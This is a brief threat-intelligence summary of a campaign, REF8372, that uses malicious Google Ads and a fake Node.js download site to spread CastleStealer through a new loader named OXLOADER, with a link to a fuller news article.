Researchers uncovered REF8372, a campaign that uses malicious Google Ads and a fake Node.js site to distribute CastleStealer through the previously unreported loader OXLOADER. The operation appears financially motivated and likely Russian-speaking, while using obfuscation, anti-sandbox checks, and legitimate services like Storj to evade detection. #CastleStealer #OXLOADER #REF8372 #Storj #GoogleAds
Keypoints
- OXLOADER is a new malware loader used to deliver CastleStealer.
- The campaign starts with malicious Google Ads and a fake Node.js download site.
- The threat actor likely speaks Russian and avoids infecting CIS-region systems.
- Storj and PowerShell are abused to stage and run the payloads.
- OXLOADER uses heavy obfuscation and anti-sandbox techniques to hinder analysis.
Read More: https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html